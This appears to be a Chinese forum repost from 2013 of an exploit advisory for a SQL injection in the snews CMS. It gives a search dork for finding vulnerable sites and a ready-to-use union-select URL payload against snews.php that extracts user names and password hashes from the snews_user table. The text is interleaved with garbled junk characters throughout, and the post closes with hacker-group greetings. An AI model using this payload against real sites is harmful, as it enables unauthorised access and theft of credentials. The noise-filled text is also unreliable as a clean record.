标题: CMS snews SQL Injection Vulnerability
& x& M( V3 E1 t" X作者: By onestree, p f, h4 `+ s* N- N9 g
下载地址 : http://snewscms.com/
/ A+ m# f2 V* W8 [6 T测试平台 : ubuntu 12.10 / win 79 d4 Z' W; T U
关键词: inurl:"tanyakan pada rumput yang bergoyang"0 [% K7 j8 p4 Q1 P
; S0 m0 a! d1 e! `) Q! D
Q- j. d0 i5 ?*************************************************************
+ U3 }3 R! \) ^7 ~1 j: x" Z " q7 F/ Q" Y% v1 Z
SQL poc:0 k$ I2 `8 T* T+ t# e
+ l% @( _, Z, S' _* e, Y# \
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]/ k. j& O& `& [( w2 V* r
3 H5 `, @" I7 n2 W; f
示例
7 n+ p' Y* U6 d$ F 8 n/ }, j2 t3 {4 I. N! X; n x
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*, K" v, ^: m9 n
+ O3 B x* U k
( s0 j* M# n, a" s- `致谢:
. d1 v0 q2 a/ x0 d6 T) w* F 0 ]0 A" y! }* ]% y5 I0 z# X, b
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
, S8 z1 L5 B1 H2 h, t) @0 u # G9 A! d% [5 P9 W" O: J
indonesiancoder - moeslimh4x0r - go-coder
5 s/ A: q, I8 x: m
5 Z; V- F4 ?/ q" J0 n) \5 H5 f2 y$ \spesial my hunny :*2 j& S1 R; C4 `
|
发表于 2013-1-23 08:55:06
收藏
支持
反对